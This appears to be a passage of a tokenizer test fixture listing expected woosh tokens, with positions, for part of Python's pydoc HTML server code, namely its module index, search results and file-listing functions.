woosh.Token(woosh.OP, ',', 2499, 69, 2499, 70),
woosh.Token(woosh.STRING, "'#ffffff'", 2500, 12, 2500, 21),
woosh.Token(woosh.OP, ',', 2500, 21, 2500, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2500, 23, 2500, 32),
woosh.Token(woosh.OP, ')', 2500, 32, 2500, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2500, 33, 2501, 0),
woosh.Token(woosh.NAME, 'names', 2501, 8, 2501, 13),
woosh.Token(woosh.OP, '=', 2501, 14, 2501, 15),
woosh.Token(woosh.OP, '[', 2501, 16, 2501, 17),
woosh.Token(woosh.NAME, 'name', 2501, 17, 2501, 21),
woosh.Token(woosh.NAME, 'for', 2501, 22, 2501, 25),
woosh.Token(woosh.NAME, 'name', 2501, 26, 2501, 30),
woosh.Token(woosh.NAME, 'in', 2501, 31, 2501, 33),
woosh.Token(woosh.NAME, 'sys', 2501, 34, 2501, 37),
woosh.Token(woosh.OP, '.', 2501, 37, 2501, 38),
woosh.Token(woosh.NAME, 'builtin_module_names', 2501, 38, 2501, 58),
woosh.Token(woosh.NAME, 'if', 2502, 17, 2502, 19),
woosh.Token(woosh.NAME, 'name', 2502, 20, 2502, 24),
woosh.Token(woosh.OP, '!=', 2502, 25, 2502, 27),
woosh.Token(woosh.STRING, "'__main__'", 2502, 28, 2502, 38),
woosh.Token(woosh.OP, ']', 2502, 38, 2502, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2502, 39, 2503, 0),
woosh.Token(woosh.NAME, 'contents', 2503, 8, 2503, 16),
woosh.Token(woosh.OP, '=', 2503, 17, 2503, 18),
woosh.Token(woosh.NAME, 'html', 2503, 19, 2503, 23),
woosh.Token(woosh.OP, '.', 2503, 23, 2503, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2503, 24, 2503, 35),
woosh.Token(woosh.OP, '(', 2503, 35, 2503, 36),
woosh.Token(woosh.NAME, 'names', 2503, 36, 2503, 41),
woosh.Token(woosh.OP, ',', 2503, 41, 2503, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2503, 43, 2503, 52),
woosh.Token(woosh.OP, ')', 2503, 52, 2503, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2503, 53, 2504, 0),
woosh.Token(woosh.NAME, 'contents', 2504, 8, 2504, 16),
woosh.Token(woosh.OP, '=', 2504, 17, 2504, 18),
woosh.Token(woosh.OP, '[', 2504, 19, 2504, 20),
woosh.Token(woosh.NAME, 'heading', 2504, 20, 2504, 27),
woosh.Token(woosh.OP, ',', 2504, 27, 2504, 28),
woosh.Token(woosh.STRING, "'<p>'", 2504, 29, 2504, 34),
woosh.Token(woosh.OP, '+', 2504, 35, 2504, 36),
woosh.Token(woosh.NAME, 'html', 2504, 37, 2504, 41),
woosh.Token(woosh.OP, '.', 2504, 41, 2504, 42),
woosh.Token(woosh.NAME, 'bigsection', 2504, 42, 2504, 52),
woosh.Token(woosh.OP, '(', 2504, 52, 2504, 53),
woosh.Token(woosh.STRING, "'Built-in Modules'", 2505, 12, 2505, 30),
woosh.Token(woosh.OP, ',', 2505, 30, 2505, 31),
woosh.Token(woosh.STRING, "'#ffffff'", 2505, 32, 2505, 41),
woosh.Token(woosh.OP, ',', 2505, 41, 2505, 42),
woosh.Token(woosh.STRING, "'#ee77aa'", 2505, 43, 2505, 52),
woosh.Token(woosh.OP, ',', 2505, 52, 2505, 53),
woosh.Token(woosh.NAME, 'contents', 2505, 54, 2505, 62),
woosh.Token(woosh.OP, ')', 2505, 62, 2505, 63),
woosh.Token(woosh.OP, ']', 2505, 63, 2505, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2505, 64, 2506, 0),
woosh.Token(woosh.NAME, 'seen', 2507, 8, 2507, 12),
woosh.Token(woosh.OP, '=', 2507, 13, 2507, 14),
woosh.Token(woosh.OP, '{', 2507, 15, 2507, 16),
woosh.Token(woosh.OP, '}', 2507, 16, 2507, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2507, 17, 2508, 0),
woosh.Token(woosh.NAME, 'for', 2508, 8, 2508, 11),
woosh.Token(woosh.NAME, 'dir', 2508, 12, 2508, 15),
woosh.Token(woosh.NAME, 'in', 2508, 16, 2508, 18),
woosh.Token(woosh.NAME, 'sys', 2508, 19, 2508, 22),
woosh.Token(woosh.OP, '.', 2508, 22, 2508, 23),
woosh.Token(woosh.NAME, 'path', 2508, 23, 2508, 27),
woosh.Token(woosh.OP, ':', 2508, 27, 2508, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2508, 28, 2509, 0),
woosh.Token(woosh.INDENT, ' ', 2509, 0, 2509, 12),
woosh.Token(woosh.NAME, 'contents', 2509, 12, 2509, 20),
woosh.Token(woosh.OP, '.', 2509, 20, 2509, 21),
woosh.Token(woosh.NAME, 'append', 2509, 21, 2509, 27),
woosh.Token(woosh.OP, '(', 2509, 27, 2509, 28),
woosh.Token(woosh.NAME, 'html', 2509, 28, 2509, 32),
woosh.Token(woosh.OP, '.', 2509, 32, 2509, 33),
woosh.Token(woosh.NAME, 'index', 2509, 33, 2509, 38),
woosh.Token(woosh.OP, '(', 2509, 38, 2509, 39),
woosh.Token(woosh.NAME, 'dir', 2509, 39, 2509, 42),
woosh.Token(woosh.OP, ',', 2509, 42, 2509, 43),
woosh.Token(woosh.NAME, 'seen', 2509, 44, 2509, 48),
woosh.Token(woosh.OP, ')', 2509, 48, 2509, 49),
woosh.Token(woosh.OP, ')', 2509, 49, 2509, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2509, 50, 2510, 0),
woosh.Token(woosh.DEDENT, ' ', 2511, 0, 2511, 8),
woosh.Token(woosh.NAME, 'contents', 2511, 8, 2511, 16),
woosh.Token(woosh.OP, '.', 2511, 16, 2511, 17),
woosh.Token(woosh.NAME, 'append', 2511, 17, 2511, 23),
woosh.Token(woosh.OP, '(', 2511, 23, 2511, 24),
woosh.Token(woosh.STRING, '\'<p align=right><font color="#909090" face="helvetica,\'', 2512, 12, 2512, 67),
woosh.Token(woosh.STRING, '\'arial"><strong>pydoc</strong> by Ka-Ping Yee\'', 2513, 12, 2513, 58),
woosh.Token(woosh.STRING, "'<ping@lfw.org></font>'", 2514, 12, 2514, 41),
woosh.Token(woosh.OP, ')', 2514, 41, 2514, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2514, 42, 2515, 0),
woosh.Token(woosh.NAME, 'return', 2515, 8, 2515, 14),
woosh.Token(woosh.STRING, "'Index of Modules'", 2515, 15, 2515, 33),
woosh.Token(woosh.OP, ',', 2515, 33, 2515, 34),
woosh.Token(woosh.STRING, "''", 2515, 35, 2515, 37),
woosh.Token(woosh.OP, '.', 2515, 37, 2515, 38),
woosh.Token(woosh.NAME, 'join', 2515, 38, 2515, 42),
woosh.Token(woosh.OP, '(', 2515, 42, 2515, 43),
woosh.Token(woosh.NAME, 'contents', 2515, 43, 2515, 51),
woosh.Token(woosh.OP, ')', 2515, 51, 2515, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2515, 52, 2516, 0),
woosh.Token(woosh.DEDENT, ' ', 2517, 0, 2517, 4),
woosh.Token(woosh.NAME, 'def', 2517, 4, 2517, 7),
woosh.Token(woosh.NAME, 'html_search', 2517, 8, 2517, 19),
woosh.Token(woosh.OP, '(', 2517, 19, 2517, 20),
woosh.Token(woosh.NAME, 'key', 2517, 20, 2517, 23),
woosh.Token(woosh.OP, ')', 2517, 23, 2517, 24),
woosh.Token(woosh.OP, ':', 2517, 24, 2517, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2517, 25, 2518, 0),
woosh.Token(woosh.INDENT, ' ', 2518, 0, 2518, 8),
woosh.Token(woosh.STRING, '"""Search results page."""', 2518, 8, 2518, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2518, 34, 2519, 0),
woosh.Token(woosh.COMMENT, '# scan for modules', 2519, 8, 2519, 26),
woosh.Token(woosh.NAME, 'search_result', 2520, 8, 2520, 21),
woosh.Token(woosh.OP, '=', 2520, 22, 2520, 23),
woosh.Token(woosh.OP, '[', 2520, 24, 2520, 25),
woosh.Token(woosh.OP, ']', 2520, 25, 2520, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2520, 26, 2521, 0),
woosh.Token(woosh.NAME, 'def', 2522, 8, 2522, 11),
woosh.Token(woosh.NAME, 'callback', 2522, 12, 2522, 20),
woosh.Token(woosh.OP, '(', 2522, 20, 2522, 21),
woosh.Token(woosh.NAME, 'path', 2522, 21, 2522, 25),
woosh.Token(woosh.OP, ',', 2522, 25, 2522, 26),
woosh.Token(woosh.NAME, 'modname', 2522, 27, 2522, 34),
woosh.Token(woosh.OP, ',', 2522, 34, 2522, 35),
woosh.Token(woosh.NAME, 'desc', 2522, 36, 2522, 40),
woosh.Token(woosh.OP, ')', 2522, 40, 2522, 41),
woosh.Token(woosh.OP, ':', 2522, 41, 2522, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2522, 42, 2523, 0),
woosh.Token(woosh.INDENT, ' ', 2523, 0, 2523, 12),
woosh.Token(woosh.NAME, 'if', 2523, 12, 2523, 14),
woosh.Token(woosh.NAME, 'modname', 2523, 15, 2523, 22),
woosh.Token(woosh.OP, '[', 2523, 22, 2523, 23),
woosh.Token(woosh.OP, '-', 2523, 23, 2523, 24),
woosh.Token(woosh.NUMBER, '9', 2523, 24, 2523, 25),
woosh.Token(woosh.OP, ':', 2523, 25, 2523, 26),
woosh.Token(woosh.OP, ']', 2523, 26, 2523, 27),
woosh.Token(woosh.OP, '==', 2523, 28, 2523, 30),
woosh.Token(woosh.STRING, "'.__init__'", 2523, 31, 2523, 42),
woosh.Token(woosh.OP, ':', 2523, 42, 2523, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2523, 43, 2524, 0),
woosh.Token(woosh.INDENT, ' ', 2524, 0, 2524, 16),
woosh.Token(woosh.NAME, 'modname', 2524, 16, 2524, 23),
woosh.Token(woosh.OP, '=', 2524, 24, 2524, 25),
woosh.Token(woosh.NAME, 'modname', 2524, 26, 2524, 33),
woosh.Token(woosh.OP, '[', 2524, 33, 2524, 34),
woosh.Token(woosh.OP, ':', 2524, 34, 2524, 35),
woosh.Token(woosh.OP, '-', 2524, 35, 2524, 36),
woosh.Token(woosh.NUMBER, '9', 2524, 36, 2524, 37),
woosh.Token(woosh.OP, ']', 2524, 37, 2524, 38),
woosh.Token(woosh.OP, '+', 2524, 39, 2524, 40),
woosh.Token(woosh.STRING, "' (package)'", 2524, 41, 2524, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2524, 53, 2525, 0),
woosh.Token(woosh.DEDENT, ' ', 2525, 0, 2525, 12),
woosh.Token(woosh.NAME, 'search_result', 2525, 12, 2525, 25),
woosh.Token(woosh.OP, '.', 2525, 25, 2525, 26),
woosh.Token(woosh.NAME, 'append', 2525, 26, 2525, 32),
woosh.Token(woosh.OP, '(', 2525, 32, 2525, 33),
woosh.Token(woosh.OP, '(', 2525, 33, 2525, 34),
woosh.Token(woosh.NAME, 'modname', 2525, 34, 2525, 41),
woosh.Token(woosh.OP, ',', 2525, 41, 2525, 42),
woosh.Token(woosh.NAME, 'desc', 2525, 43, 2525, 47),
woosh.Token(woosh.NAME, 'and', 2525, 48, 2525, 51),
woosh.Token(woosh.STRING, "'- '", 2525, 52, 2525, 56),
woosh.Token(woosh.OP, '+', 2525, 57, 2525, 58),
woosh.Token(woosh.NAME, 'desc', 2525, 59, 2525, 63),
woosh.Token(woosh.OP, ')', 2525, 63, 2525, 64),
woosh.Token(woosh.OP, ')', 2525, 64, 2525, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2525, 65, 2526, 0),
woosh.Token(woosh.DEDENT, ' ', 2527, 0, 2527, 8),
woosh.Token(woosh.NAME, 'with', 2527, 8, 2527, 12),
woosh.Token(woosh.NAME, 'warnings', 2527, 13, 2527, 21),
woosh.Token(woosh.OP, '.', 2527, 21, 2527, 22),
woosh.Token(woosh.NAME, 'catch_warnings', 2527, 22, 2527, 36),
woosh.Token(woosh.OP, '(', 2527, 36, 2527, 37),
woosh.Token(woosh.OP, ')', 2527, 37, 2527, 38),
woosh.Token(woosh.OP, ':', 2527, 38, 2527, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2527, 39, 2528, 0),
woosh.Token(woosh.INDENT, ' ', 2528, 0, 2528, 12),
woosh.Token(woosh.NAME, 'warnings', 2528, 12, 2528, 20),
woosh.Token(woosh.OP, '.', 2528, 20, 2528, 21),
woosh.Token(woosh.NAME, 'filterwarnings', 2528, 21, 2528, 35),
woosh.Token(woosh.OP, '(', 2528, 35, 2528, 36),
woosh.Token(woosh.STRING, "'ignore'", 2528, 36, 2528, 44),
woosh.Token(woosh.OP, ')', 2528, 44, 2528, 45),
woosh.Token(woosh.COMMENT, '# ignore problems during import', 2528, 46, 2528, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 2528, 77, 2529, 0),
woosh.Token(woosh.NAME, 'def', 2529, 12, 2529, 15),
woosh.Token(woosh.NAME, 'onerror', 2529, 16, 2529, 23),
woosh.Token(woosh.OP, '(', 2529, 23, 2529, 24),
woosh.Token(woosh.NAME, 'modname', 2529, 24, 2529, 31),
woosh.Token(woosh.OP, ')', 2529, 31, 2529, 32),
woosh.Token(woosh.OP, ':', 2529, 32, 2529, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2529, 33, 2530, 0),
woosh.Token(woosh.INDENT, ' ', 2530, 0, 2530, 16),
woosh.Token(woosh.NAME, 'pass', 2530, 16, 2530, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2530, 20, 2531, 0),
woosh.Token(woosh.DEDENT, ' ', 2531, 0, 2531, 12),
woosh.Token(woosh.NAME, 'ModuleScanner', 2531, 12, 2531, 25),
woosh.Token(woosh.OP, '(', 2531, 25, 2531, 26),
woosh.Token(woosh.OP, ')', 2531, 26, 2531, 27),
woosh.Token(woosh.OP, '.', 2531, 27, 2531, 28),
woosh.Token(woosh.NAME, 'run', 2531, 28, 2531, 31),
woosh.Token(woosh.OP, '(', 2531, 31, 2531, 32),
woosh.Token(woosh.NAME, 'callback', 2531, 32, 2531, 40),
woosh.Token(woosh.OP, ',', 2531, 40, 2531, 41),
woosh.Token(woosh.NAME, 'key', 2531, 42, 2531, 45),
woosh.Token(woosh.OP, ',', 2531, 45, 2531, 46),
woosh.Token(woosh.NAME, 'onerror', 2531, 47, 2531, 54),
woosh.Token(woosh.OP, '=', 2531, 54, 2531, 55),
woosh.Token(woosh.NAME, 'onerror', 2531, 55, 2531, 62),
woosh.Token(woosh.OP, ')', 2531, 62, 2531, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2531, 63, 2532, 0),
woosh.Token(woosh.COMMENT, '# format page', 2533, 8, 2533, 21),
woosh.Token(woosh.DEDENT, ' ', 2534, 0, 2534, 8),
woosh.Token(woosh.NAME, 'def', 2534, 8, 2534, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2534, 12, 2534, 21),
woosh.Token(woosh.OP, '(', 2534, 21, 2534, 22),
woosh.Token(woosh.NAME, 'name', 2534, 22, 2534, 26),
woosh.Token(woosh.OP, ')', 2534, 26, 2534, 27),
woosh.Token(woosh.OP, ':', 2534, 27, 2534, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2534, 28, 2535, 0),
woosh.Token(woosh.INDENT, ' ', 2535, 0, 2535, 12),
woosh.Token(woosh.NAME, 'return', 2535, 12, 2535, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 2535, 19, 2535, 45),
woosh.Token(woosh.OP, '%', 2535, 46, 2535, 47),
woosh.Token(woosh.OP, '(', 2535, 48, 2535, 49),
woosh.Token(woosh.NAME, 'name', 2535, 49, 2535, 53),
woosh.Token(woosh.OP, ',', 2535, 53, 2535, 54),
woosh.Token(woosh.NAME, 'name', 2535, 55, 2535, 59),
woosh.Token(woosh.OP, ')', 2535, 59, 2535, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2535, 60, 2536, 0),
woosh.Token(woosh.DEDENT, ' ', 2537, 0, 2537, 8),
woosh.Token(woosh.NAME, 'results', 2537, 8, 2537, 15),
woosh.Token(woosh.OP, '=', 2537, 16, 2537, 17),
woosh.Token(woosh.OP, '[', 2537, 18, 2537, 19),
woosh.Token(woosh.OP, ']', 2537, 19, 2537, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2537, 20, 2538, 0),
woosh.Token(woosh.NAME, 'heading', 2538, 8, 2538, 15),
woosh.Token(woosh.OP, '=', 2538, 16, 2538, 17),
woosh.Token(woosh.NAME, 'html', 2538, 18, 2538, 22),
woosh.Token(woosh.OP, '.', 2538, 22, 2538, 23),
woosh.Token(woosh.NAME, 'heading', 2538, 23, 2538, 30),
woosh.Token(woosh.OP, '(', 2538, 30, 2538, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Search Results</strong></big></big>'", 2539, 12, 2539, 67),
woosh.Token(woosh.OP, ',', 2539, 67, 2539, 68),
woosh.Token(woosh.STRING, "'#ffffff'", 2540, 12, 2540, 21),
woosh.Token(woosh.OP, ',', 2540, 21, 2540, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2540, 23, 2540, 32),
woosh.Token(woosh.OP, ')', 2540, 32, 2540, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2540, 33, 2541, 0),
woosh.Token(woosh.NAME, 'for', 2541, 8, 2541, 11),
woosh.Token(woosh.NAME, 'name', 2541, 12, 2541, 16),
woosh.Token(woosh.OP, ',', 2541, 16, 2541, 17),
woosh.Token(woosh.NAME, 'desc', 2541, 18, 2541, 22),
woosh.Token(woosh.NAME, 'in', 2541, 23, 2541, 25),
woosh.Token(woosh.NAME, 'search_result', 2541, 26, 2541, 39),
woosh.Token(woosh.OP, ':', 2541, 39, 2541, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2541, 40, 2542, 0),
woosh.Token(woosh.INDENT, ' ', 2542, 0, 2542, 12),
woosh.Token(woosh.NAME, 'results', 2542, 12, 2542, 19),
woosh.Token(woosh.OP, '.', 2542, 19, 2542, 20),
woosh.Token(woosh.NAME, 'append', 2542, 20, 2542, 26),
woosh.Token(woosh.OP, '(', 2542, 26, 2542, 27),
woosh.Token(woosh.NAME, 'bltinlink', 2542, 27, 2542, 36),
woosh.Token(woosh.OP, '(', 2542, 36, 2542, 37),
woosh.Token(woosh.NAME, 'name', 2542, 37, 2542, 41),
woosh.Token(woosh.OP, ')', 2542, 41, 2542, 42),
woosh.Token(woosh.OP, '+', 2542, 43, 2542, 44),
woosh.Token(woosh.NAME, 'desc', 2542, 45, 2542, 49),
woosh.Token(woosh.OP, ')', 2542, 49, 2542, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2542, 50, 2543, 0),
woosh.Token(woosh.DEDENT, ' ', 2543, 0, 2543, 8),
woosh.Token(woosh.NAME, 'contents', 2543, 8, 2543, 16),
woosh.Token(woosh.OP, '=', 2543, 17, 2543, 18),
woosh.Token(woosh.NAME, 'heading', 2543, 19, 2543, 26),
woosh.Token(woosh.OP, '+', 2543, 27, 2543, 28),
woosh.Token(woosh.NAME, 'html', 2543, 29, 2543, 33),
woosh.Token(woosh.OP, '.', 2543, 33, 2543, 34),
woosh.Token(woosh.NAME, 'bigsection', 2543, 34, 2543, 44),
woosh.Token(woosh.OP, '(', 2543, 44, 2543, 45),
woosh.Token(woosh.STRING, "'key = %s'", 2544, 12, 2544, 22),
woosh.Token(woosh.OP, '%', 2544, 23, 2544, 24),
woosh.Token(woosh.NAME, 'key', 2544, 25, 2544, 28),
woosh.Token(woosh.OP, ',', 2544, 28, 2544, 29),
woosh.Token(woosh.STRING, "'#ffffff'", 2544, 30, 2544, 39),
woosh.Token(woosh.OP, ',', 2544, 39, 2544, 40),
woosh.Token(woosh.STRING, "'#ee77aa'", 2544, 41, 2544, 50),
woosh.Token(woosh.OP, ',', 2544, 50, 2544, 51),
woosh.Token(woosh.STRING, "'<br>'", 2544, 52, 2544, 58),
woosh.Token(woosh.OP, '.', 2544, 58, 2544, 59),
woosh.Token(woosh.NAME, 'join', 2544, 59, 2544, 63),
woosh.Token(woosh.OP, '(', 2544, 63, 2544, 64),
woosh.Token(woosh.NAME, 'results', 2544, 64, 2544, 71),
woosh.Token(woosh.OP, ')', 2544, 71, 2544, 72),
woosh.Token(woosh.OP, ')', 2544, 72, 2544, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2544, 73, 2545, 0),
woosh.Token(woosh.NAME, 'return', 2545, 8, 2545, 14),
woosh.Token(woosh.STRING, "'Search Results'", 2545, 15, 2545, 31),
woosh.Token(woosh.OP, ',', 2545, 31, 2545, 32),
woosh.Token(woosh.NAME, 'contents', 2545, 33, 2545, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2545, 41, 2546, 0),
woosh.Token(woosh.DEDENT, ' ', 2547, 0, 2547, 4),
woosh.Token(woosh.NAME, 'def', 2547, 4, 2547, 7),
woosh.Token(woosh.NAME, 'html_getfile', 2547, 8, 2547, 20),
woosh.Token(woosh.OP, '(', 2547, 20, 2547, 21),
woosh.Token(woosh.NAME, 'path', 2547, 21, 2547, 25),
woosh.Token(woosh.OP, ')', 2547, 25, 2547, 26),
woosh.Token(woosh.OP, ':', 2547, 26, 2547, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2547, 27, 2548, 0),
woosh.Token(woosh.INDENT, ' ', 2548, 0, 2548, 8),
woosh.Token(woosh.STRING, '"""Get and display a source file listing safely."""', 2548, 8, 2548, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2548, 59, 2549, 0),
woosh.Token(woosh.NAME, 'path', 2549, 8, 2549, 12),
woosh.Token(woosh.OP, '=', 2549, 13, 2549, 14),
woosh.Token(woosh.NAME, 'urllib', 2549, 15, 2549, 21),
woosh.Token(woosh.OP, '.', 2549, 21, 2549, 22),
woosh.Token(woosh.NAME, 'parse', 2549, 22, 2549, 27),
woosh.Token(woosh.OP, '.', 2549, 27, 2549, 28),
woosh.Token(woosh.NAME, 'unquote', 2549, 28, 2549, 35),
woosh.Token(woosh.OP, '(', 2549, 35, 2549, 36),
woosh.Token(woosh.NAME, 'path', 2549, 36, 2549, 40),
woosh.Token(woosh.OP, ')', 2549, 40, 2549, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2549, 41, 2550, 0),
woosh.Token(woosh.NAME, 'with', 2550, 8, 2550, 12),
woosh.Token(woosh.NAME, 'tokenize', 2550, 13, 2550, 21),
woosh.Token(woosh.OP, '.', 2550, 21, 2550, 22),
woosh.Token(woosh.NAME, 'open', 2550, 22, 2550, 26),
woosh.Token(woosh.OP, '(', 2550, 26, 2550, 27),
woosh.Token(woosh.NAME, 'path', 2550, 27, 2550, 31),
woosh.Token(woosh.OP, ')', 2550, 31, 2550, 32),
woosh.Token(woosh.NAME, 'as', 2550, 33, 2550, 35),
woosh.Token(woosh.NAME, 'fp', 2550, 36, 2550, 38),
woosh.Token(woosh.OP, ':', 2550, 38, 2550, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2550, 39, 2551, 0),
woosh.Token(woosh.INDENT, ' ', 2551, 0, 2551, 12),
woosh.Token(woosh.NAME, 'lines', 2551, 12, 2551, 17),
woosh.Token(woosh.OP, '=', 2551, 18, 2551, 19),
woosh.Token(woosh.NAME, 'html', 2551, 20, 2551, 24),
woosh.Token(woosh.OP, '.', 2551, 24, 2551, 25),
woosh.Token(woosh.NAME, 'escape', 2551, 25, 2551, 31),
woosh.Token(woosh.OP, '(', 2551, 31, 2551, 32),
woosh.Token(woosh.NAME, 'fp', 2551, 32, 2551, 34),
woosh.Token(woosh.OP, '.', 2551, 34, 2551, 35),
woosh.Token(woosh.NAME, 'read', 2551, 35, 2551, 39),
woosh.Token(woosh.OP, '(', 2551, 39, 2551, 40),
woosh.Token(woosh.OP, ')', 2551, 40, 2551, 41),
woosh.Token(woosh.OP, ')', 2551, 41, 2551, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2551, 42, 2552, 0),
woosh.Token(woosh.DEDENT, ' ', 2552, 0, 2552, 8),
woosh.Token(woosh.NAME, 'body', 2552, 8, 2552, 12),
woosh.Token(woosh.OP, '=', 2552, 13, 2552, 14),
woosh.Token(woosh.STRING, "'<pre>%s</pre>'", 2552, 15, 2552, 30),
woosh.Token(woosh.OP, '%', 2552, 31, 2552, 32),
woosh.Token(woosh.NAME, 'lines', 2552, 33, 2552, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2552, 38, 2553, 0),
woosh.Token(woosh.NAME, 'heading', 2553, 8, 2553, 15),
woosh.Token(woosh.OP, '=', 2553, 16, 2553, 17),
woosh.Token(woosh.NAME, 'html', 2553, 18, 2553, 22),
woosh.Token(woosh.OP, '.', 2553, 22, 2553, 23),
woosh.Token(woosh.NAME, 'heading', 2553, 23, 2553, 30),
woosh.Token(woosh.OP, '(', 2553, 30, 2553, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>File Listing</strong></big></big>'", 2554, 12, 2554, 65),
woosh.Token(woosh.OP, ',', 2554, 65, 2554, 66),
woosh.Token(woosh.STRING, "'#ffffff'", 2555, 12, 2555, 21),
woosh.Token(woosh.OP, ',', 2555, 21, 2555, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2555, 23, 2555, 32),
woosh.Token(woosh.OP, ')', 2555, 32, 2555, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2555, 33, 2556, 0),
woosh.Token(woosh.NAME, 'contents', 2556, 8, 2556, 16),
woosh.Token(woosh.OP, '=', 2556, 17, 2556, 18),
woosh.Token(woosh.NAME, 'heading', 2556, 19, 2556, 26),
woosh.Token(woosh.OP, '+', 2556, 27, 2556, 28),
woosh.Token(woosh.NAME, 'html', 2556, 29, 2556, 33),
woosh.Token(woosh.OP, '.', 2556, 33, 2556, 34),
woosh.Token(woosh.NAME, 'bigsection', 2556, 34, 2556, 44),
woosh.Token(woosh.OP, '(', 2556, 44, 2556, 45),
woosh.Token(woosh.STRING, "'File: %s'", 2557, 12, 2557, 22),
woosh.Token(woosh.OP, '%', 2557, 23, 2557, 24),
woosh.Token(woosh.NAME, 'path', 2557, 25, 2557, 29),
woosh.Token(woosh.OP, ',', 2557, 29, 2557, 30),
woosh.Token(woosh.STRING, "'#ffffff'", 2557, 31, 2557, 40),
woosh.Token(woosh.OP, ',', 2557, 40, 2557, 41),
woosh.Token(woosh.STRING, "'#ee77aa'", 2557, 42, 2557, 51),
woosh.Token(woosh.OP, ',', 2557, 51, 2557, 52),
woosh.Token(woosh.NAME, 'body', 2557, 53, 2557, 57),
woosh.Token(woosh.OP, ')', 2557, 57, 2557, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2557, 58, 2558, 0),
woosh.Token(woosh.NAME, 'return', 2558, 8, 2558, 14),
woosh.Token(woosh.STRING, "'getfile %s'", 2558, 15, 2558, 27),
woosh.Token(woosh.OP, '%', 2558, 28, 2558, 29),
woosh.Token(woosh.NAME, 'path', 2558, 30, 2558, 34),
woosh.Token(woosh.OP, ',', 2558, 34, 2558, 35),
woosh.Token(woosh.NAME, 'contents', 2558, 36, 2558, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2558, 44, 2559, 0),
woosh.Token(woosh.DEDENT, ' ', 2560, 0, 2560, 4),
woosh.Token(woosh.NAME, 'def', 2560, 4, 2560, 7),
woosh.Token(woosh.NAME, 'html_topics', 2560, 8, 2560, 19),
woosh.Token(woosh.OP, '(', 2560, 19, 2560, 20),
woosh.Token(woosh.OP, ')', 2560, 20, 2560, 21),
woosh.Token(woosh.OP, ':', 2560, 21, 2560, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2560, 22, 2561, 0),
woosh.Token(woosh.INDENT, ' ', 2561, 0, 2561, 8),
woosh.Token(woosh.STRING, '"""Index of topic texts available."""', 2561, 8, 2561, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2561, 45, 2562, 0),
woosh.Token(woosh.NAME, 'def', 2563, 8, 2563, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2563, 12, 2563, 21),
woosh.Token(woosh.OP, '(', 2563, 21, 2563, 22),
woosh.Token(woosh.NAME, 'name', 2563, 22, 2563, 26),
woosh.Token(woosh.OP, ')', 2563, 26, 2563, 27),
woosh.Token(woosh.OP, ':', 2563, 27, 2563, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2563, 28, 2564, 0),
woosh.Token(woosh.INDENT, ' ', 2564, 0, 2564, 12),
woosh.Token(woosh.NAME, 'return', 2564, 12, 2564, 18),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2564, 19, 2564, 50),
woosh.Token(woosh.OP, '%', 2564, 51, 2564, 52),
woosh.Token(woosh.OP, '(', 2564, 53, 2564, 54),
woosh.Token(woosh.NAME, 'name', 2564, 54, 2564, 58),
woosh.Token(woosh.OP, ',', 2564, 58, 2564, 59),
woosh.Token(woosh.NAME, 'name', 2564, 60, 2564, 64),
woosh.Token(woosh.OP, ')', 2564, 64, 2564, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2564, 65, 2565, 0),
woosh.Token(woosh.DEDENT, ' ', 2566, 0, 2566, 8),
woosh.Token(woosh.NAME, 'heading', 2566, 8, 2566, 15),
woosh.Token(woosh.OP, '=', 2566, 16, 2566, 17),
woosh.Token(woosh.NAME, 'html', 2566, 18, 2566, 22),
woosh.Token(woosh.OP, '.', 2566, 22, 2566, 23),
woosh.Token(woosh.NAME, 'heading', 2566, 23, 2566, 30),
woosh.Token(woosh.OP, '(', 2566, 30, 2566, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>INDEX</strong></big></big>'", 2567, 12, 2567, 58),
